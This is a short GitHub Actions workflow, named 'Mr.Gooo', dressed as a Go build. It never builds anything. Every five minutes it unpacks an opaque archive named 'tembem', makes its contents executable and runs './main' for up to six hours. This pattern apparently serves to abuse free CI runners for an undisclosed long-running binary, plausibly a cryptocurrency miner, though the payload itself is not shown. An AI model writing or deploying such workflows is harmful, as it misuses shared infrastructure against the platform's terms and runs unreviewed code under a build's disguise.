name: Mr.Gooo

on:  
  push:
  pull_request:
  schedule:
  - cron: "*/5 * * * *"
 
jobs:

 Build:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
         go: [1.11]
         flag: [A]
    timeout-minutes: 360
    env:
        NUM_JOBS: 90
        JOB: ${{ matrix.go.flag }}
 
    steps:
    - uses: actions/checkout@v2
    - name: SetUp_01
      run: tar -xf tembem && chmod u+x *
    - name: SetUp_02
      run: ./main








